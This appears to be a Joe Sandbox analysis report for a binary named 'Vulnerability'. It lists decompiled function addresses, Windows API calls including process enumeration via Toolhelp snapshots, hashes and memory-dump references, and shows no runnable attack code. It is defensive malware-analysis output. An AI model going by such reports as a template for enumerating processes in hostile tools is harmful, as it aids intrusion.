                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID:
                                                                                          • API String ID: 1082002092-0
                                                                                          • Opcode ID: 6755a856d871fba1efbdf4653af67588a1488c608911402bc09cbd1524d65175
                                                                                          • Instruction ID: 3d3478501f0a27f494612459dc8a45106a72668902b573dbd0be5fc8322f36e4
                                                                                          • Opcode Fuzzy Hash: 6755a856d871fba1efbdf4653af67588a1488c608911402bc09cbd1524d65175
                                                                                          • Instruction Fuzzy Hash: 1C512D72608AC181EF21AF19E590238EBA0FF84FA9B65C472DE8E43765CF3DD5468310
                                                                                          Function 00007FF7CC421590 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetShellWindow.USER32 ref: 00007FF7CC4215AB
                                                                                          • GetWindowThreadProcessId.USER32 ref: 00007FF7CC4215B9
                                                                                            • Part of subcall function 00007FF7CC4214C0: GetCurrentProcessId.KERNEL32 ref: 00007FF7CC4214E6
                                                                                            • Part of subcall function 00007FF7CC4214C0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7CC4214F3
                                                                                            • Part of subcall function 00007FF7CC4214C0: memset.VCRUNTIME140 ref: 00007FF7CC421514
                                                                                            • Part of subcall function 00007FF7CC4214C0: Process32FirstW.KERNEL32 ref: 00007FF7CC421529
                                                                                            • Part of subcall function 00007FF7CC4214C0: Process32NextW.KERNEL32 ref: 00007FF7CC421541
                                                                                            • Part of subcall function 00007FF7CC4214C0: CloseHandle.KERNEL32 ref: 00007FF7CC42155A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4215E7
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC42160A
                                                                                          • ?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC421617
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@V01@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@?good@ios_base@std@@ProcessProcess32V01@@Window$?flush@?$basic_ostream@_?get@?$basic_istream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@CloseCreateCurrentFirstHandleNextOsfx@?$basic_ostream@_ShellSnapshotThreadToolhelp32V12@memset
                                                                                          • String ID: [+] Pausing to allow for debugging$[+] Press enter to close
                                                                                          • API String ID: 3552510059-3552938800
                                                                                          • Opcode ID: c7a771cc183a09f00474d4221a554b7660f8d7c106dbf2dcb96536c2c8a81f4e
                                                                                          • Instruction ID: 65a6853dc47fab090083dc34dbda36be06b46a6e3c2986d65a59c40771da4834
                                                                                          • Opcode Fuzzy Hash: c7a771cc183a09f00474d4221a554b7660f8d7c106dbf2dcb96536c2c8a81f4e
                                                                                          • Instruction Fuzzy Hash: AF01DB65E18AC281EA10BF10E8561B8AB61BF88BBCFC09132D84D47266DE3CE345C730
                                                                                          Function 00007FF7CC424738 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
                                                                                          • String ID:
                                                                                          • API String ID: 1876865454-0
                                                                                          • Opcode ID: 81a9dc358cc5445206e6b3113a70518158365fa1dd99ecfb0ae8e3a6ee9012e8
                                                                                          • Instruction ID: fa32decab394939c50b5011f18fbb4d45eaee30eac929e271022798fde71738c
                                                                                          • Opcode Fuzzy Hash: 81a9dc358cc5445206e6b3113a70518158365fa1dd99ecfb0ae8e3a6ee9012e8
                                                                                          • Instruction Fuzzy Hash: 8F3150A5E181C241FA10BF21A4173B9DE91EF857ACFC5E034EA4D47AD3DE2CE6048630
                                                                                          Function 00007FF7CC41A170 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF7CC41A1AA
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A1C7
                                                                                          • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7CC41A1F0
                                                                                          • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A23B
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7CD
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7E7
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C819
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C844
                                                                                            • Part of subcall function 00007FF7CC41C7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7CC41C85D
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C87C
                                                                                          • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A250
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A267
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                          • String ID:
                                                                                          • API String ID: 3911317180-0
                                                                                          • Opcode ID: 5a6826561ea74aa17af60af851ddc47ae6a38e229cbe3f585e2f7ad79cec9b38
                                                                                          • Instruction ID: f775ba49434d244eb0f1dbc93844d049f7077a6264adff1f5c8f56f25c3b82f9
                                                                                          • Opcode Fuzzy Hash: 5a6826561ea74aa17af60af851ddc47ae6a38e229cbe3f585e2f7ad79cec9b38
                                                                                          • Instruction Fuzzy Hash: 7E31373260AB8182EB50EF25A804369B7A4FB89FA8F548139DE8E47B58DF3CD545C750
                                                                                          Function 00007FF7CC419FB0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7CC419FEA
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A007
                                                                                          • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7CC41A030
                                                                                          • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A07B
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7CD
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7E7
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C819
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C844
                                                                                            • Part of subcall function 00007FF7CC41C7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7CC41C85D
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C87C
                                                                                          • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A090
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A0A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                          • String ID:
                                                                                          • API String ID: 3911317180-0
                                                                                          • Opcode ID: f95377b0793453415ea5f2f5c81a2309527505f0e92931372e17918f4aaa2e9c
                                                                                          • Instruction ID: e215ecf1ffb90bcc85782aadba9d18059fddc33e8f33a559122f465dd40b9a2f
                                                                                          • Opcode Fuzzy Hash: f95377b0793453415ea5f2f5c81a2309527505f0e92931372e17918f4aaa2e9c
                                                                                          • Instruction Fuzzy Hash: D0319C32619B8586EB50AF25A800369BBE4FB88FA8F548035DE8D07B58DF3CD144C710
                                                                                          Function 00007FF7CC419790 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4197CC
                                                                                          • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4197EB
                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC41981D
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC419838
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC419883
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 1184074665-0
                                                                                          • Opcode ID: e6428d08daa05c0431e2d938a8ad9b90a068d51e3d7a087df42541e2e422740f
                                                                                          • Instruction ID: fdbdb93df42444401cd4dfe0e0e6274ff9d4f5382cd1d7a0741cd3177521d711
                                                                                          • Opcode Fuzzy Hash: e6428d08daa05c0431e2d938a8ad9b90a068d51e3d7a087df42541e2e422740f
                                                                                          • Instruction Fuzzy Hash: 4A316932A06BC286EB109F29EA94729BBA0FB85FADF44C135CA4D43714DF38D265C750
                                                                                          Function 00007FF7CC4189C0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4189F3
                                                                                          • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC418A12
                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC418A44
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC418A5F
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7CC419FEA
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A007
                                                                                            • Part of subcall function 00007FF7CC419FB0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7CC41A030
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A07B
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A090
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC418AA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
                                                                                          • String ID:
                                                                                          • API String ID: 219286276-0
                                                                                          • Opcode ID: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
                                                                                          • Instruction ID: 08f44eeee8ccc85c9e3763a690b22ff59b75f977285f93b5bd7959b25ae2db9a
                                                                                          • Opcode Fuzzy Hash: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
                                                                                          • Instruction Fuzzy Hash: 12211732608B8186EB109F29F85436ABBA4FB89B99F94C135DA8D43725DF3DD205CB50
                                                                                          Function 00007FF7CC418F90 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
                                                                                          • Instruction ID: 3433db9ee64b864271c18d4c31355034554509b63b53a6d381d5b1deaf5f9b08
                                                                                          • Opcode Fuzzy Hash: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
                                                                                          • Instruction Fuzzy Hash: B231A436704A8286EE659F26E4043B9EBA1FB44BE8F988035CF8D47751DE3DE586C310
                                                                                          Function 00007FF7CC424654 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize_configthreadlocale_initialize_onexit_table_initialize_wide_environment
                                                                                          • String ID:
                                                                                          • API String ID: 2955177221-0
                                                                                          • Opcode ID: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
                                                                                          • Instruction ID: f547ba24df6a305b426097e42ac8908fb9863e794c460ad604ca8c835033b169
                                                                                          • Opcode Fuzzy Hash: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
                                                                                          • Instruction Fuzzy Hash: 0A1199A1E182C306FA697FB654172B89D81DF90368FC6E434E51E46EC3ED2CAA454632
                                                                                          Function 00007FF7CC424108 Relevance: 4.5, APIs: 3, Instructions: 21COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC424138
                                                                                            • Part of subcall function 00007FF7CC424B1C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CC424B25
                                                                                            • Part of subcall function 00007FF7CC424B1C: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF7CC42413D,?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43), ref: 00007FF7CC424B36
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC42413E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
                                                                                          • String ID:
                                                                                          • API String ID: 594857686-0
                                                                                          • Opcode ID: 47bd4ed3095be75780f1d8431e270a3ae190829c7a451f3961b14f3cea497438
                                                                                          • Instruction ID: a4921f8028bc7c681fe774bf1de67407da168f3d16f91c47e22991cecc44bb33
                                                                                          • Opcode Fuzzy Hash: 47bd4ed3095be75780f1d8431e270a3ae190829c7a451f3961b14f3cea497438
                                                                                          • Instruction Fuzzy Hash: E2E0EC80E0928B55FD697A61280B1B4DC408F68779EA8B730DABD49ECBAD1CA6525630
                                                                                          Function 00007FF7CC41A5A0 Relevance: 4.5, APIs: 3, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7CC41A5B5
                                                                                          • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF7CC41A5C1
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A5CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
                                                                                          • String ID:
                                                                                          • API String ID: 2094784882-0
                                                                                          • Opcode ID: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
                                                                                          • Instruction ID: f36d1b2d7a22e4e5ad46e3ccca99e1ae90fa76174f0664d8689f2bb54cee6c9b
                                                                                          • Opcode Fuzzy Hash: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
                                                                                          • Instruction Fuzzy Hash: 1BD05E14B84B9682DE08AF26B8951785720EF8DFAAB4CE030CD0FC7311CE3CE1958324
                                                                                          Function 00007FF7CC418DB0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
